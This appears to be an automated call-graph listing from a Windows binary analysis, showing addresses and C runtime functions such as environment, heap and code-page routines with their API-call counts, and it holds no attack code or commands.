18181->18182 18182->17335 18184 7ff60b1225e5 18183->18184 18185 7ff60b134bd8 48 API calls 18184->18185 18186 7ff60b122604 18185->18186 18186->17352 18232 7ff60b138794 18187->18232 18191 7ff60b1281dc 18190->18191 18192 7ff60b129390 2 API calls 18191->18192 18193 7ff60b1281fb 18192->18193 18194 7ff60b128216 ExpandEnvironmentStringsW 18193->18194 18195 7ff60b128203 18193->18195 18197 7ff60b12823c __vcrt_freefls 18194->18197 18371 7ff60b12456a 18370->18371 18372 7ff60b129390 2 API calls 18371->18372 18373 7ff60b12458f 18372->18373 18374 7ff60b12c550 _log10_special 8 API calls 18373->18374 18375 7ff60b1245b7 18374->18375 18375->17384 18377 7ff60b127e2e 18376->18377 18377->18377 18378 7ff60b127f52 18377->18378 18379 7ff60b121c80 49 API calls 18377->18379 18380 7ff60b12c550 _log10_special 8 API calls 18378->18380 18384 7ff60b127eb5 18379->18384 18381 7ff60b127f83 18380->18381 18381->17384 18382 7ff60b121c80 49 API calls 18382->18384 18383 7ff60b124560 10 API calls 18383->18384 18384->18378 18384->18382 18384->18383 18385 7ff60b129390 2 API calls 18384->18385 18386 7ff60b127f23 CreateDirectoryW 18385->18386 18386->18378 18386->18384 18388 7ff60b121637 18387->18388 18389 7ff60b121613 18387->18389 18391 7ff60b1245c0 108 API calls 18388->18391 18508 7ff60b121050 18389->18508 18393 7ff60b12164b 18391->18393 18395 7ff60b121653 18393->18395 18396 7ff60b121682 18393->18396 18399 7ff60b134f08 _get_daylight 11 API calls 18395->18399 18397 7ff60b1245c0 108 API calls 18396->18397 18400 7ff60b121696 18397->18400 18401 7ff60b121658 18399->18401 18402 7ff60b1216b8 18400->18402 18403 7ff60b12169e 18400->18403 18404 7ff60b122910 54 API calls 18401->18404 18407 7ff60b1306d4 73 API calls 18402->18407 18406 7ff60b122710 54 API calls 18403->18406 18405 7ff60b121671 18404->18405 18405->17384 18436 7ff60b12718b 18435->18436 18438 7ff60b127144 18435->18438 18436->17384 18438->18436 18572 7ff60b135024 18438->18572 18440 7ff60b1241a1 18439->18440 18441 7ff60b1244e0 49 API calls 18440->18441 18442 7ff60b1241db 18441->18442 18443 7ff60b1244e0 49 API calls 18442->18443 18444 7ff60b1241eb 18443->18444 18445 7ff60b12420d 18444->18445 18446 7ff60b12423c 18444->18446 18587 7ff60b124110 18445->18587 18448 7ff60b124110 51 API calls 18446->18448 18449 7ff60b12423a 18448->18449 18484 7ff60b121c80 49 API calls 18483->18484 18485 7ff60b124474 18484->18485 18485->17384 18509 7ff60b1245c0 108 API calls 18508->18509 18510 7ff60b12108c 18509->18510 18511 7ff60b1210a9 18510->18511 18512 7ff60b121094 18510->18512 18514 7ff60b1306d4 73 API calls 18511->18514 18513 7ff60b122710 54 API calls 18512->18513 18520 7ff60b1210a4 __vcrt_freefls 18513->18520 18515 7ff60b1210bf 18514->18515 18573 7ff60b135031 18572->18573 18574 7ff60b13505e 18572->18574 18576 7ff60b134f08 _get_daylight 11 API calls 18573->18576 18583 7ff60b134fe8 18573->18583 18575 7ff60b135081 18574->18575 18578 7ff60b13509d 18574->18578 18577 7ff60b134f08 _get_daylight 11 API calls 18575->18577 18579 7ff60b13503b 18576->18579 18580 7ff60b135086 18577->18580 18581 7ff60b134f4c 45 API calls 18578->18581 18582 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18579->18582 18584 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18580->18584 18586 7ff60b135091 18581->18586 18585 7ff60b135046 18582->18585 18583->18438 18584->18586 18585->18438 18586->18438 18651 7ff60b135ec8 18650->18651 18652 7ff60b135eee 18651->18652 18654 7ff60b135f21 18651->18654 18653 7ff60b134f08 _get_daylight 11 API calls 18652->18653 18655 7ff60b135ef3 18653->18655 18656 7ff60b135f27 18654->18656 18657 7ff60b135f34 18654->18657 18658 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 18655->18658 18660 7ff60b134f08 _get_daylight 11 API calls 18656->18660 18669 7ff60b13ac28 18657->18669 18659 7ff60b124616 18658->18659 18659->17415 18660->18659 18682 7ff60b1402d8 EnterCriticalSection 18669->18682 19042 7ff60b1378f8 19041->19042 19045 7ff60b1373d4 19042->19045 19044 7ff60b137911 19044->17425 19046 7ff60b13741e 19045->19046 19047 7ff60b1373ef 19045->19047 19055 7ff60b13546c EnterCriticalSection 19046->19055 19049 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 19047->19049 19050 7ff60b13740f 19049->19050 19050->19044 19057 7ff60b12fe71 19056->19057 19058 7ff60b12fe43 19056->19058 19065 7ff60b12fe63 19057->19065 19066 7ff60b13546c EnterCriticalSection 19057->19066 19059 7ff60b13a814 _invalid_parameter_noinfo 37 API calls 19058->19059 19059->19065 19065->17429 19068 7ff60b1245c0 108 API calls 19067->19068 19069 7ff60b121493 19068->19069 19070 7ff60b12149b 19069->19070 19071 7ff60b1214bc 19069->19071 19174 7ff60b126375 19173->19174 19175 7ff60b121c80 49 API calls 19174->19175 19176 7ff60b1263b1 19175->19176 19177 7ff60b1263ba 19176->19177 19178 7ff60b1263dd 19176->19178 19180 7ff60b122710 54 API calls 19177->19180 19179 7ff60b124630 49 API calls 19178->19179 19181 7ff60b1263f5 19179->19181 19182 7ff60b1263d3 19180->19182 19183 7ff60b126413 19181->19183 19184 7ff60b122710 54 API calls 19181->19184 19186 7ff60b12c550 _log10_special 8 API calls 19182->19186 19185 7ff60b124560 10 API calls 19183->19185 19184->19183 19188 7ff60b12336e 19186->19188 19448 7ff60b13b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19447->19448 19449 7ff60b13a3e1 19448->19449 19450 7ff60b13a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19449->19450 19451 7ff60b13a401 19450->19451 16338 7ff60b1408c8 16339 7ff60b1408ec 16338->16339 16342 7ff60b1408fc 16338->16342 16340 7ff60b134f08 _get_daylight 11 API calls 16339->16340 16363 7ff60b1408f1 16340->16363 16341 7ff60b140bdc 16344 7ff60b134f08 _get_daylight 11 API calls 16341->16344 16342->16341 16343 7ff60b14091e 16342->16343 16345 7ff60b14093f 16343->16345 16487 7ff60b140f84 16343->16487 16346 7ff60b140be1 16344->16346 16349 7ff60b1409b1 16345->16349 16350 7ff60b140965 16345->16350 16355 7ff60b1409a5 16345->16355 16348 7ff60b13a948 __free_lconv_mon 11 API calls 16346->16348 16348->16363 16353 7ff60b13eb98 _get_daylight 11 API calls 16349->16353 16367 7ff60b140974 16349->16367 16502 7ff60b1396c0 16350->16502 16351 7ff60b140a5e 16362 7ff60b140a7b 16351->16362 16368 7ff60b140acd 16351->16368 16356 7ff60b1409c7 16353->16356 16355->16351 16355->16367 16508 7ff60b14712c 16355->16508 16359 7ff60b13a948 __free_lconv_mon 11 API calls 16356->16359 16358 7ff60b13a948 __free_lconv_mon 11 API calls 16358->16363 16364 7ff60b1409d5 16359->16364 16360 7ff60b14098d 16360->16355 16370 7ff60b140f84 45 API calls 16360->16370 16361 7ff60b14096f 16365 7ff60b134f08 _get_daylight 11 API calls 16361->16365 16366 7ff60b13a948 __free_lconv_mon 11 API calls 16362->16366 16364->16355 16364->16367 16372 7ff60b13eb98 _get_daylight 11 API calls 16364->16372 16365->16367 16369 7ff60b140a84 16366->16369 16367->16358 16368->16367 16371 7ff60b1433dc 40 API calls 16368->16371 16377 7ff60b140a89 16369->16377 16544 7ff60b1433dc 16369->16544 16370->16355 16373 7ff60b140b0a 16371->16373 16375 7ff60b1409f7 16372->16375 16376 7ff60b13a948 __free_lconv_mon 11 API calls 16373->16376 16380 7ff60b13a948 __free_lconv_mon 11 API calls 16375->16380 16381 7ff60b140b14 16376->16381 16378 7ff60b140bd0 16377->16378 16384 7ff60b13eb98 _get_daylight 11 API calls 16377->16384 16383 7ff60b13a948 __free_lconv_mon 11 API calls 16378->16383 16379 7ff60b140ab5 16382 7ff60b13a948 __free_lconv_mon 11 API calls 16379->16382 16380->16355 16381->16367 16381->16377 16382->16377 16383->16363 16385 7ff60b140b58 16384->16385 16386 7ff60b140b69 16385->16386 16387 7ff60b140b60 16385->16387 16469 7ff60b13a4a4 16386->16469 16388 7ff60b13a948 __free_lconv_mon 11 API calls 16387->16388 16390 7ff60b140b67 16388->16390 16395 7ff60b13a948 __free_lconv_mon 11 API calls 16390->16395 16392 7ff60b140c0b 16394 7ff60b13a900 _isindst 17 API calls 16392->16394 16393 7ff60b140b80 16553 7ff60b147244 16393->16553 16397 7ff60b140c1f 16394->16397 16395->16363 16399 7ff60b140c48 16397->16399 16409 7ff60b140c58 16397->16409 16403 7ff60b134f08 _get_daylight 11 API calls 16399->16403 16400 7ff60b140bc8 16404 7ff60b13a948 __free_lconv_mon 11 API calls 16400->16404 16401 7ff60b140ba7 16402 7ff60b134f08 _get_daylight 11 API calls 16401->16402 16405 7ff60b140bac 16402->16405 16406 7ff60b140c4d 16403->16406 16404->16378 16407 7ff60b13a948 __free_lconv_mon 11 API calls 16405->16407 16407->16390 16408 7ff60b140f3b 16411 7ff60b134f08 _get_daylight 11 API calls 16408->16411 16409->16408 16410 7ff60b140c7a 16409->16410 16412 7ff60b140c97 16410->16412 16572 7ff60b14106c 16410->16572 16413 7ff60b140f40 16411->16413 16416 7ff60b140d0b 16412->16416 16418 7ff60b140cbf 16412->16418 16422 7ff60b140cff 16412->16422 16415 7ff60b13a948 __free_lconv_mon 11 API calls 16413->16415 16415->16406 16420 7ff60b140d33 16416->16420 16423 7ff60b13eb98 _get_daylight 11 API calls 16416->16423 16436 7ff60b140cce 16416->16436 16417 7ff60b140dbe 16431 7ff60b140ddb 16417->16431 16437 7ff60b140e2e 16417->16437 16587 7ff60b1396fc 16418->16587 16420->16422 16425 7ff60b13eb98 _get_daylight 11 API calls 16420->16425 16420->16436 16422->16417 16422->16436 16593 7ff60b146fec 16422->16593 16427 7ff60b140d25 16423->16427 16430 7ff60b140d55 16425->16430 16426 7ff60b13a948 __free_lconv_mon 11 API calls 16426->16406 16432 7ff60b13a948 __free_lconv_mon 11 API calls 16427->16432 16428 7ff60b140cc9 16433 7ff60b134f08 _get_daylight 11 API calls 16428->16433 16429 7ff60b140ce7 16429->16422 16439 7ff60b14106c 45 API calls 16429->16439 16434 7ff60b13a948 __free_lconv_mon 11 API calls 16430->16434 16435 7ff60b13a948 __free_lconv_mon 11 API calls 16431->16435 16432->16420 16433->16436 16434->16422 16438 7ff60b140de4 16435->16438 16436->16426 16437->16436 16440 7ff60b1433dc 40 API calls 16437->16440 16442 7ff60b1433dc 40 API calls 16438->16442 16445 7ff60b140dea 16438->16445 16439->16422 16441 7ff60b140e6c 16440->16441 16443 7ff60b13a948 __free_lconv_mon 11 API calls 16441->16443 16444 7ff60b140e16 16442->16444 16447 7ff60b140e76 16443->16447 16448 7ff60b13a948 __free_lconv_mon 11 API calls 16444->16448 16446 7ff60b140f2f 16445->16446 16450 7ff60b13eb98 _get_daylight 11 API calls 16445->16450 16449 7ff60b13a948 __free_lconv_mon 11 API calls 16446->16449 16447->16436 16447->16445 16448->16445 16449->16406 16451 7ff60b140ebb 16450->16451 16452 7ff60b140ecc 16451->16452 16453 7ff60b140ec3 16451->16453 16478 7ff60b140474 16452->16478 16454 7ff60b13a948 __free_lconv_mon 11 API calls 16453->16454 16456 7ff60b140eca 16454->16456 16461 7ff60b13a948 __free_lconv_mon 11 API calls 16456->16461 16458 7ff60b140f6f 16460 7ff60b13a900 _isindst 17 API calls 16458->16460 16459 7ff60b140ee2 SetEnvironmentVariableW 16462 7ff60b140f27 16459->16462 16463 7ff60b140f06 16459->16463 16465 7ff60b140f83 16460->16465 16461->16406 16466 7ff60b13a948 __free_lconv_mon 11 API calls 16462->16466 16464 7ff60b134f08 _get_daylight 11 API calls 16463->16464 16467 7ff60b140f0b 16464->16467 16466->16446 16468 7ff60b13a948 __free_lconv_mon 11 API calls 16467->16468 16468->16456 16471 7ff60b13a4b1 16469->16471 16473 7ff60b13a4bb 16469->16473 16470 7ff60b134f08 _get_daylight 11 API calls 16472 7ff60b13a4c2 16470->16472 16471->16473 16476 7ff60b13a4d6 16471->16476 16474 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16472->16474 16473->16470 16475 7ff60b13a4ce 16474->16475 16475->16392 16475->16393 16476->16475 16477 7ff60b134f08 _get_daylight 11 API calls 16476->16477 16477->16472 16479 7ff60b140481 16478->16479 16480 7ff60b14048b 16478->16480 16479->16480 16485 7ff60b1404a7 16479->16485 16481 7ff60b134f08 _get_daylight 11 API calls 16480->16481 16482 7ff60b140493 16481->16482 16483 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16482->16483 16484 7ff60b14049f 16483->16484 16484->16458 16484->16459 16485->16484 16486 7ff60b134f08 _get_daylight 11 API calls 16485->16486 16486->16482 16488 7ff60b140fb9 16487->16488 16495 7ff60b140fa1 16487->16495 16489 7ff60b13eb98 _get_daylight 11 API calls 16488->16489 16498 7ff60b140fdd 16489->16498 16490 7ff60b141062 16492 7ff60b13a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16490->16492 16491 7ff60b14103e 16493 7ff60b13a948 __free_lconv_mon 11 API calls 16491->16493 16494 7ff60b141068 16492->16494 16493->16495 16495->16345 16496 7ff60b13eb98 _get_daylight 11 API calls 16496->16498 16497 7ff60b13a948 __free_lconv_mon 11 API calls 16497->16498 16498->16490 16498->16491 16498->16496 16498->16497 16499 7ff60b13a4a4 __std_exception_copy 37 API calls 16498->16499 16500 7ff60b14104d 16498->16500 16499->16498 16501 7ff60b13a900 _isindst 17 API calls 16500->16501 16501->16490 16503 7ff60b1396d9 16502->16503 16504 7ff60b1396d0 16502->16504 16503->16360 16503->16361 16504->16503 16617 7ff60b139198 16504->16617 16509 7ff60b147139 16508->16509 16510 7ff60b146254 16508->16510 16512 7ff60b134f4c 45 API calls 16509->16512 16511 7ff60b146261 16510->16511 16517 7ff60b146297 16510->16517 16513 7ff60b134f08 _get_daylight 11 API calls 16511->16513 16532 7ff60b146208 16511->16532 16515 7ff60b14716d 16512->16515 16516 7ff60b14626b 16513->16516 16514 7ff60b1462c1 16518 7ff60b134f08 _get_daylight 11 API calls 16514->16518 16519 7ff60b147172 16515->16519 16520 7ff60b147183 16515->16520 16525 7ff60b14719a 16515->16525 16521 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16516->16521 16517->16514 16522 7ff60b1462e6 16517->16522 16523 7ff60b1462c6 16518->16523 16519->16355 16526 7ff60b134f08 _get_daylight 11 API calls 16520->16526 16527 7ff60b146276 16521->16527 16531 7ff60b134f4c 45 API calls 16522->16531 16535 7ff60b1462d1 16522->16535 16524 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16523->16524 16524->16535 16529 7ff60b1471b6 16525->16529 16530 7ff60b1471a4 16525->16530 16528 7ff60b147188 16526->16528 16527->16355 16533 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16528->16533 16536 7ff60b1471c7 16529->16536 16537 7ff60b1471de 16529->16537 16534 7ff60b134f08 _get_daylight 11 API calls 16530->16534 16531->16535 16532->16355 16533->16519 16539 7ff60b1471a9 16534->16539 16535->16355 16878 7ff60b1462a4 16536->16878 16887 7ff60b148f4c 16537->16887 16542 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16539->16542 16542->16519 16543 7ff60b134f08 _get_daylight 11 API calls 16543->16519 16545 7ff60b14341b 16544->16545 16546 7ff60b1433fe 16544->16546 16547 7ff60b143425 16545->16547 16927 7ff60b147c38 16545->16927 16546->16545 16548 7ff60b14340c 16546->16548 16934 7ff60b147c74 16547->16934 16550 7ff60b134f08 _get_daylight 11 API calls 16548->16550 16552 7ff60b143411 memcpy_s 16550->16552 16552->16379 16554 7ff60b134f4c 45 API calls 16553->16554 16555 7ff60b1472aa 16554->16555 16557 7ff60b1472b8 16555->16557 16946 7ff60b13ef24 16555->16946 16949 7ff60b1354ac 16557->16949 16560 7ff60b1473a4 16563 7ff60b1473b5 16560->16563 16564 7ff60b13a948 __free_lconv_mon 11 API calls 16560->16564 16561 7ff60b134f4c 45 API calls 16562 7ff60b147327 16561->16562 16566 7ff60b13ef24 5 API calls 16562->16566 16568 7ff60b147330 16562->16568 16565 7ff60b140ba3 16563->16565 16567 7ff60b13a948 __free_lconv_mon 11 API calls 16563->16567 16564->16563 16565->16400 16565->16401 16566->16568 16567->16565 16569 7ff60b1354ac 14 API calls 16568->16569 16570 7ff60b14738b 16569->16570 16570->16560 16571 7ff60b147393 SetEnvironmentVariableW 16570->16571 16571->16560 16573 7ff60b14108f 16572->16573 16574 7ff60b1410ac 16572->16574 16573->16412 16574->16574 16575 7ff60b13eb98 _get_daylight 11 API calls 16574->16575 16582 7ff60b1410d0 16575->16582 16576 7ff60b141154 16578 7ff60b13a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16576->16578 16577 7ff60b141131 16580 7ff60b13a948 __free_lconv_mon 11 API calls 16577->16580 16579 7ff60b14115a 16578->16579 16580->16573 16581 7ff60b13eb98 _get_daylight 11 API calls 16581->16582 16582->16576 16582->16577 16582->16581 16583 7ff60b13a948 __free_lconv_mon 11 API calls 16582->16583 16584 7ff60b140474 37 API calls 16582->16584 16585 7ff60b141140 16582->16585 16583->16582 16584->16582 16586 7ff60b13a900 _isindst 17 API calls 16585->16586 16586->16576 16588 7ff60b13970c 16587->16588 16589 7ff60b139715 16587->16589 16588->16589 16971 7ff60b13920c 16588->16971 16589->16428 16589->16429 16594 7ff60b146ff9 16593->16594 16599 7ff60b147026 16593->16599 16595 7ff60b146ffe 16594->16595 16594->16599 16596 7ff60b134f08 _get_daylight 11 API calls 16595->16596 16597 7ff60b147003 16596->16597 16600 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16597->16600 16598 7ff60b14706a 16602 7ff60b134f08 _get_daylight 11 API calls 16598->16602 16599->16598 16601 7ff60b147089 16599->16601 16615 7ff60b14705e __crtLCMapStringW 16599->16615 16603 7ff60b14700e 16600->16603 16604 7ff60b1470a5 16601->16604 16605 7ff60b147093 16601->16605 16606 7ff60b14706f 16602->16606 16603->16422 16608 7ff60b134f4c 45 API calls 16604->16608 16607 7ff60b134f08 _get_daylight 11 API calls 16605->16607 16609 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16606->16609 16610 7ff60b147098 16607->16610 16611 7ff60b1470b2 16608->16611 16609->16615 16612 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16610->16612 16611->16615 17018 7ff60b148b08 16611->17018 16612->16615 16615->16422 16616 7ff60b134f08 _get_daylight 11 API calls 16616->16615 16618 7ff60b1391b1 16617->16618 16619 7ff60b1391ad 16617->16619 16640 7ff60b1425f0 16618->16640 16619->16503 16632 7ff60b1394ec 16619->16632 16624 7ff60b1391cf 16666 7ff60b13927c 16624->16666 16625 7ff60b1391c3 16626 7ff60b13a948 __free_lconv_mon 11 API calls 16625->16626 16626->16619 16629 7ff60b13a948 __free_lconv_mon 11 API calls 16630 7ff60b1391f6 16629->16630 16631 7ff60b13a948 __free_lconv_mon 11 API calls 16630->16631 16631->16619 16633 7ff60b139515 16632->16633 16638 7ff60b13952e 16632->16638 16633->16503 16634 7ff60b13eb98 _get_daylight 11 API calls 16634->16638 16635 7ff60b1395be 16637 7ff60b13a948 __free_lconv_mon 11 API calls 16635->16637 16636 7ff60b1407e8 WideCharToMultiByte 16636->16638 16637->16633 16638->16633 16638->16634 16638->16635 16638->16636 16639 7ff60b13a948 __free_lconv_mon 11 API calls 16638->16639 16639->16638 16641 7ff60b1391b6 16640->16641 16642 7ff60b1425fd 16640->16642 16646 7ff60b14292c GetEnvironmentStringsW 16641->16646 16685 7ff60b13b224 16642->16685 16647 7ff60b14295c 16646->16647 16648 7ff60b1391bb 16646->16648 16649 7ff60b1407e8 WideCharToMultiByte 16647->16649 16648->16624 16648->16625 16650 7ff60b1429ad 16649->16650 16651 7ff60b1429b4 FreeEnvironmentStringsW 16650->16651 16652 7ff60b13d5fc _fread_nolock 12 API calls 16650->16652 16651->16648 16653 7ff60b1429c7 16652->16653 16654 7ff60b1429d8 16653->16654 16655 7ff60b1429cf 16653->16655 16657 7ff60b1407e8 WideCharToMultiByte 16654->16657 16656 7ff60b13a948 __free_lconv_mon 11 API calls 16655->16656 16658 7ff60b1429d6 16656->16658 16659 7ff60b1429fb 16657->16659 16658->16651 16660 7ff60b142a09 16659->16660 16661 7ff60b1429ff 16659->16661 16663 7ff60b13a948 __free_lconv_mon 11 API calls 16660->16663 16662 7ff60b13a948 __free_lconv_mon 11 API calls 16661->16662 16664 7ff60b142a07 FreeEnvironmentStringsW 16662->16664 16663->16664 16664->16648 16667 7ff60b1392a1 16666->16667 16668 7ff60b13eb98 _get_daylight 11 API calls 16667->16668 16681 7ff60b1392d7 16668->16681 16669 7ff60b1392df 16670 7ff60b13a948 __free_lconv_mon 11 API calls 16669->16670 16671 7ff60b1391d7 16670->16671 16671->16629 16672 7ff60b139352 16673 7ff60b13a948 __free_lconv_mon 11 API calls 16672->16673 16673->16671 16674 7ff60b13eb98 _get_daylight 11 API calls 16674->16681 16675 7ff60b139341 16872 7ff60b1394a8 16675->16872 16677 7ff60b13a4a4 __std_exception_copy 37 API calls 16677->16681 16679 7ff60b13a948 __free_lconv_mon 11 API calls 16679->16669 16680 7ff60b139377 16682 7ff60b13a900 _isindst 17 API calls 16680->16682 16681->16669 16681->16672 16681->16674 16681->16675 16681->16677 16681->16680 16683 7ff60b13a948 __free_lconv_mon 11 API calls 16681->16683 16684 7ff60b13938a 16682->16684 16683->16681 16686 7ff60b13b250 FlsSetValue 16685->16686 16687 7ff60b13b235 FlsGetValue 16685->16687 16689 7ff60b13b242 16686->16689 16690 7ff60b13b25d 16686->16690 16688 7ff60b13b24a 16687->16688 16687->16689 16688->16686 16691 7ff60b13b248 16689->16691 16692 7ff60b13a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16689->16692 16693 7ff60b13eb98 _get_daylight 11 API calls 16690->16693 16705 7ff60b1422c4 16691->16705 16694 7ff60b13b2c5 16692->16694 16695 7ff60b13b26c 16693->16695 16696 7ff60b13b28a FlsSetValue 16695->16696 16697 7ff60b13b27a FlsSetValue 16695->16697 16698 7ff60b13b2a8 16696->16698 16699 7ff60b13b296 FlsSetValue 16696->16699 16700 7ff60b13b283 16697->16700 16701 7ff60b13aef4 _get_daylight 11 API calls 16698->16701 16699->16700 16702 7ff60b13a948 __free_lconv_mon 11 API calls 16700->16702 16703 7ff60b13b2b0 16701->16703 16702->16689 16704 7ff60b13a948 __free_lconv_mon 11 API calls 16703->16704 16704->16691 16728 7ff60b142534 16705->16728 16707 7ff60b1422f9 16743 7ff60b141fc4 16707->16743 16710 7ff60b142316 16710->16641 16713 7ff60b14232f 16714 7ff60b13a948 __free_lconv_mon 11 API calls 16713->16714 16714->16710 16715 7ff60b14233e 16715->16715 16757 7ff60b14266c 16715->16757 16718 7ff60b14243a 16719 7ff60b134f08 _get_daylight 11 API calls 16718->16719 16720 7ff60b14243f 16719->16720 16722 7ff60b13a948 __free_lconv_mon 11 API calls 16720->16722 16721 7ff60b142495 16724 7ff60b1424fc 16721->16724 16768 7ff60b141df4 16721->16768 16722->16710 16723 7ff60b142454 16723->16721 16727 7ff60b13a948 __free_lconv_mon 11 API calls 16723->16727 16726 7ff60b13a948 __free_lconv_mon 11 API calls 16724->16726 16726->16710 16727->16721 16729 7ff60b142557 16728->16729 16730 7ff60b142561 16729->16730 16783 7ff60b1402d8 EnterCriticalSection 16729->16783 16733 7ff60b1425d3 16730->16733 16735 7ff60b13a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16730->16735 16733->16707 16737 7ff60b1425eb 16735->16737 16739 7ff60b142642 16737->16739 16740 7ff60b13b224 50 API calls 16737->16740 16739->16707 16741 7ff60b14262c 16740->16741 16742 7ff60b1422c4 65 API calls 16741->16742 16742->16739 16744 7ff60b134f4c 45 API calls 16743->16744 16745 7ff60b141fd8 16744->16745 16746 7ff60b141ff6 16745->16746 16747 7ff60b141fe4 GetOEMCP 16745->16747 16748 7ff60b14200b 16746->16748 16749 7ff60b141ffb GetACP 16746->16749 16747->16748 16748->16710 16750 7ff60b13d5fc 16748->16750 16749->16748 16751 7ff60b13d647 16750->16751 16752 7ff60b13d60b _get_daylight 16750->16752 16754 7ff60b134f08 _get_daylight 11 API calls 16751->16754 16752->16751 16753 7ff60b13d62e HeapAlloc 16752->16753 16756 7ff60b143590 _get_daylight 2 API calls 16752->16756 16753->16752 16755 7ff60b13d645 16753->16755 16754->16755 16755->16713 16755->16715 16756->16752 16758 7ff60b141fc4 47 API calls 16757->16758 16759 7ff60b142699 16758->16759 16760 7ff60b1427ef 16759->16760 16762 7ff60b1426d6 IsValidCodePage 16759->16762 16767 7ff60b1426f0 memcpy_s 16759->16767 16761 7ff60b12c550 _log10_special 8 API calls 16760->16761 16763 7ff60b142431 16761->16763 16762->16760 16764 7ff60b1426e7 16762->16764 16763->16718 16763->16723 16765 7ff60b142716 GetCPInfo 16764->16765 16764->16767 16765->16760 16765->16767 16784 7ff60b1420dc 16767->16784 16871 7ff60b1402d8 EnterCriticalSection 16768->16871 16785 7ff60b142119 GetCPInfo 16784->16785 16794 7ff60b14220f 16784->16794 16790 7ff60b14212c 16785->16790 16785->16794 16786 7ff60b12c550 _log10_special 8 API calls 16788 7ff60b1422ae 16786->16788 16788->16760 16795 7ff60b142e40 16790->16795 16794->16786 16796 7ff60b134f4c 45 API calls 16795->16796 16797 7ff60b142e82 16796->16797 16815 7ff60b13f8a0 16797->16815 16817 7ff60b13f8a9 MultiByteToWideChar 16815->16817 16873 7ff60b1394ad 16872->16873 16877 7ff60b139349 16872->16877 16874 7ff60b1394d6 16873->16874 16876 7ff60b13a948 __free_lconv_mon 11 API calls 16873->16876 16875 7ff60b13a948 __free_lconv_mon 11 API calls 16874->16875 16875->16877 16876->16873 16877->16679 16879 7ff60b1462d8 16878->16879 16880 7ff60b1462c1 16878->16880 16879->16880 16882 7ff60b1462e6 16879->16882 16881 7ff60b134f08 _get_daylight 11 API calls 16880->16881 16883 7ff60b1462c6 16881->16883 16885 7ff60b134f4c 45 API calls 16882->16885 16886 7ff60b1462d1 16882->16886 16884 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16883->16884 16884->16886 16885->16886 16886->16519 16888 7ff60b134f4c 45 API calls 16887->16888 16889 7ff60b148f71 16888->16889 16892 7ff60b148bc8 16889->16892 16894 7ff60b148c16 16892->16894 16893 7ff60b12c550 _log10_special 8 API calls 16895 7ff60b147205 16893->16895 16896 7ff60b148c9d 16894->16896 16898 7ff60b148c88 GetCPInfo 16894->16898 16901 7ff60b148ca1 16894->16901 16895->16519 16895->16543 16897 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 16896->16897 16896->16901 16899 7ff60b148d35 16897->16899 16898->16896 16898->16901 16900 7ff60b13d5fc _fread_nolock 12 API calls 16899->16900 16899->16901 16902 7ff60b148d6c 16899->16902 16900->16902 16901->16893 16902->16901 16903 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 16902->16903 16904 7ff60b148dda 16903->16904 16905 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 16904->16905 16914 7ff60b148ebc 16904->16914 16907 7ff60b148e00 16905->16907 16906 7ff60b13a948 __free_lconv_mon 11 API calls 16906->16901 16908 7ff60b13d5fc _fread_nolock 12 API calls 16907->16908 16909 7ff60b148e2d 16907->16909 16907->16914 16908->16909 16910 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 16909->16910 16909->16914 16911 7ff60b148ea4 16910->16911 16912 7ff60b148eaa 16911->16912 16913 7ff60b148ec4 16911->16913 16912->16914 16916 7ff60b13a948 __free_lconv_mon 11 API calls 16912->16916 16921 7ff60b13ef68 16913->16921 16914->16901 16914->16906 16916->16914 16918 7ff60b148f03 16918->16901 16920 7ff60b13a948 __free_lconv_mon 11 API calls 16918->16920 16919 7ff60b13a948 __free_lconv_mon 11 API calls 16919->16918 16920->16901 16922 7ff60b13ed10 __crtLCMapStringW 5 API calls 16921->16922 16923 7ff60b13efa6 16922->16923 16924 7ff60b13f1d0 __crtLCMapStringW 5 API calls 16923->16924 16926 7ff60b13efae 16923->16926 16925 7ff60b13f017 CompareStringW 16924->16925 16925->16926 16926->16918 16926->16919 16928 7ff60b147c5a HeapSize 16927->16928 16929 7ff60b147c41 16927->16929 16930 7ff60b134f08 _get_daylight 11 API calls 16929->16930 16931 7ff60b147c46 16930->16931 16932 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16931->16932 16933 7ff60b147c51 16932->16933 16933->16547 16935 7ff60b147c89 16934->16935 16936 7ff60b147c93 16934->16936 16937 7ff60b13d5fc _fread_nolock 12 API calls 16935->16937 16938 7ff60b147c98 16936->16938 16944 7ff60b147c9f _get_daylight 16936->16944 16942 7ff60b147c91 16937->16942 16941 7ff60b13a948 __free_lconv_mon 11 API calls 16938->16941 16939 7ff60b147ca5 16943 7ff60b134f08 _get_daylight 11 API calls 16939->16943 16940 7ff60b147cd2 HeapReAlloc 16940->16942 16940->16944 16941->16942 16942->16552 16943->16942 16944->16939 16944->16940 16945 7ff60b143590 _get_daylight 2 API calls 16944->16945 16945->16944 16947 7ff60b13ed10 __crtLCMapStringW 5 API calls 16946->16947 16948 7ff60b13ef44 16947->16948 16948->16557 16950 7ff60b1354d6 16949->16950 16951 7ff60b1354fa 16949->16951 16955 7ff60b13a948 __free_lconv_mon 11 API calls 16950->16955 16959 7ff60b1354e5 16950->16959 16952 7ff60b1354ff 16951->16952 16953 7ff60b135554 16951->16953 16956 7ff60b135514 16952->16956 16952->16959 16960 7ff60b13a948 __free_lconv_mon 11 API calls 16952->16960 